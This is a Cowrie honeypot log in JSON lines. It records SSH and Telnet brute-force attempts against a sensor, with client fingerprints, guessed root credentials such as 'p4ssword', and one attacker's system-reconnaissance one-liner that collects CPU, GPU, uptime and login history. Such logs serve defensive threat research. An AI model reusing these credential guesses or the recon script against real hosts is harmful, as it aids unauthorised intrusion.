{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37712,"dst_ip":"1.2.3.4","dst_port":22,"session":"d35a65994376","protocol":"ssh","message":"New connection: 212.227.235.229:37712 (1.2.3.4:22) [session: d35a65994376]","sensor":"my-vps","timestamp":"2025-08-26T21:09:17.162881Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:09:17.165311Z","src_ip":"212.227.235.229","session":"d35a65994376"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:09:17.626734Z","src_ip":"212.227.235.229","session":"d35a65994376"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":46486,"dst_ip":"1.2.3.4","dst_port":23,"session":"7e7251b8d3e2","protocol":"telnet","message":"New connection: 176.65.149.186:46486 (1.2.3.4:23) [session: 7e7251b8d3e2]","sensor":"my-vps","timestamp":"2025-08-26T21:09:17.927157Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:09:17.965929Z","src_ip":"176.65.149.186","session":"7e7251b8d3e2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:09:18.039599Z","src_ip":"176.65.149.186","session":"7e7251b8d3e2"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-26T21:09:18.041020Z","src_ip":"176.65.149.186","session":"7e7251b8d3e2"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-26T21:09:18.042076Z","src_ip":"176.65.149.186","session":"7e7251b8d3e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":15926,"dst_ip":"1.2.3.4","dst_port":22,"session":"e62dc4647a84","protocol":"ssh","message":"New connection: 212.227.235.229:15926 (1.2.3.4:22) [session: e62dc4647a84]","sensor":"my-vps","timestamp":"2025-08-26T21:09:18.998038Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:09:18.999407Z","src_ip":"212.227.235.229","session":"e62dc4647a84"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:09:19.164723Z","src_ip":"212.227.235.229","session":"e62dc4647a84"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44076,"dst_ip":"1.2.3.4","dst_port":22,"session":"acf203dbf718","protocol":"ssh","message":"New connection: 212.227.235.229:44076 (1.2.3.4:22) [session: acf203dbf718]","sensor":"my-vps","timestamp":"2025-08-26T21:09:19.544409Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:09:19.642190Z","src_ip":"212.227.235.229","session":"acf203dbf718"}
{"eventid":"cowrie.login.failed","username":"test","password":"admin","message":"login attempt [test/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T21:09:19.656950Z","src_ip":"212.227.235.229","session":"d35a65994376"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w#E4r%T6y","message":"login attempt [root/!Q2w#E4r%T6y] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:09:19.660531Z","src_ip":"212.227.235.229","session":"e62dc4647a84"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:09:20.007015Z","src_ip":"212.227.235.229","session":"e62dc4647a84"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T21:09:20.007925Z","src_ip":"212.227.235.229","session":"e62dc4647a84"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:09:20.070492Z","src_ip":"212.227.235.229","session":"acf203dbf718"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:09:20.174812Z","src_ip":"212.227.235.229","session":"e62dc4647a84"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:09:20.176240Z","src_ip":"212.227.235.229","session":"e62dc4647a84"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:09:21.274689Z","src_ip":"212.227.235.229","session":"d35a65994376"}
{"eventid":"cowrie.login.failed","username":"www","password":"www","message":"login attempt [www/www] failed","sensor":"my-vps","timestamp":"2025-08-26T21:09:21.804949Z","src_ip":"212.227.235.229","session":"acf203dbf718"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:09:23.712836Z","src_ip":"212.227.235.229","session":"acf203dbf718"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37370,"dst_ip":"1.2.3.4","dst_port":22,"session":"9cb6986470e9","protocol":"ssh","message":"New connection: 212.227.235.229:37370 (1.2.3.4:22) [session: 9cb6986470e9]","sensor":"my-vps","timestamp":"2025-08-26T21:09:40.492712Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60500,"dst_ip":"1.2.3.4","dst_port":22,"session":"192c656db843","protocol":"ssh","message":"New connection: 212.227.235.229:60500 (1.2.3.4:22) [session: 192c656db843]","sensor":"my-vps","timestamp":"2025-08-26T21:09:40.573830Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:09:40.727985Z","src_ip":"212.227.235.229","session":"192c656db843"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:09:40.828152Z","src_ip":"212.227.235.229","session":"192c656db843"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:09:41.842789Z","src_ip":"212.227.235.229","session":"9cb6986470e9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T21:09:42.048224Z","src_ip":"212.227.235.229","session":"9cb6986470e9"}
{"eventid":"cowrie.login.failed","username":"matrix","password":"matrix","message":"login attempt [matrix/matrix] failed","sensor":"my-vps","timestamp":"2025-08-26T21:09:42.885834Z","src_ip":"212.227.235.229","session":"192c656db843"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:09:44.367776Z","src_ip":"212.227.235.229","session":"192c656db843"}
{"eventid":"cowrie.login.success","username":"root","password":"p4ssword","message":"login attempt [root/p4ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:09:46.568774Z","src_ip":"212.227.235.229","session":"9cb6986470e9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:09:50.560484Z","src_ip":"212.227.235.229","session":"9cb6986470e9"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T21:09:50.561175Z","src_ip":"212.227.235.229","session":"9cb6986470e9"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T21:09:50.561614Z","src_ip":"212.227.235.229","session":"9cb6986470e9"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T21:09:50.562506Z","src_ip":"212.227.235.229","session":"9cb6986470e9"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T21:09:50.563883Z","src_ip":"212.227.235.229","session":"9cb6986470e9"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T21:09:50.564823Z","src_ip":"212.227.235.229","session":"9cb6986470e9"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T21:09:50.565763Z","src_ip":"212.227.235.229","session":"9cb6986470e9"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T21:09:50.567060Z","src_ip":"212.227.235.229","session":"9cb6986470e9"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T21:09:50.567561Z","src_ip":"212.227.235.229","session":"9cb6986470e9"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T21:09:50.568319Z","src_ip":"212.227.235.229","session":"9cb6986470e9"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T21:09:50.568886Z","src_ip":"212.227.235.229","session":"9cb6986470e9"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T21:09:50.569514Z","src_ip":"212.227.235.229","session":"9cb6986470e9"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T21:09:50.570143Z","src_ip":"212.227.235.229","session":"9cb6986470e9"}
